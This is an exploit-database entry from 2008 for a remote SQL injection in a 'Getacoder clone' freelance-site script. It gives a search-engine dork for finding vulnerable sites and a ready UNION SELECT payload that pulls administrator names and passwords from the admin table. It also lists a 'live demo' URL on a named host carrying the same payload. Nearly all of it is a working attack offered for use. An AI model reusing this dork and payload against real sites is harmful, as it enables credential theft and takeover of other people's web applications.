id: 3458
date: 07/26/2008
title: Getacoder clone (sb_protype) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

===============================================================
Getacoder clone (sb_protype) Remote SQL Injection Vulnerability
===============================================================



|___________________________________________________|
|
| Getacoder Clone Script (sb_protype) Remote SQL Injection Vulnerability
|
|
|___________________________________________________
|                                                   |
|
| DorK   : inurl:"search_form.php?sb_showresult="
|___________________________________________________|



Exploit:  

www.[target].com/Script/search_form.php?sb_showresult=1&sb_protype=-2+UNION+SELECT+1,concat_ws(0x3a,sb_admin_name,sb_pwd),3+from+sbprj_admin--

 

L!VE DEMO: :


http://www.demosgreatclone.com/getacoder/search_form.php?sb_showresult=1&sb_protype=-2+UNION+SELECT+1,concat_ws(0x3a,sb_admin_name,sb_pwd),3+from+sbprj_admin--





#  0day.today [2023-03-22]  #